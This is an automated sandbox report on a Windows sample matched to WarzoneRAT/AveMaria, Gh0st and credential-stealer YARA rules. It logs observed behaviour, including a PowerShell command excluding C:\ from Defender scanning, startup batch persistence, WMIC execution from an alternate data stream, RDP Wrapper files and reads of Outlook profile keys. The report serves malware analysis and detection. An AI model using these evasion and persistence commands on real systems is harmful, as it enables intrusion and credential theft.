          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.2.images.exe.22f89af.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22f89af.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000003.252571359.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: String function: 00407FC0 appears 33 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: String function: 02D20969 appears 47 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: String function: 02D135E5 appears 40 times
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000000.242916125.0000000000554000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeBinary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\Users\user\AppData\Local\Microsoft Vision\Jump to behavior
          Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winEXE@18/18@0/1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1D49C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_02D1D49C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00406750 LoadResource,LockResource,SizeofResource,0_2_00406750
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeReversingLabs: Detection: 24%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
          Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
          Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'
          Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exeJump to behavior
          Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
          Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1F619 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,0_2_02D1F619
          Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_caqnsxdv.wy2.ps1Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D2290F CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,0_2_02D2290F
          Source: C:\ProgramData\images.exeCode function: 4_3_02F494E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,4_3_02F494E0
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D220B8 RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_02D220B8
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6376:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01
          Source: C:\ProgramData\images.exeFile written: C:\Program Files\Microsoft DN1\rdpwrap.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\ProgramData\images.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
          Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to behavior
          Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.iniJump to behavior
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuser32.pdb source: images.exe, images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wuser32.pdbUGP source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp
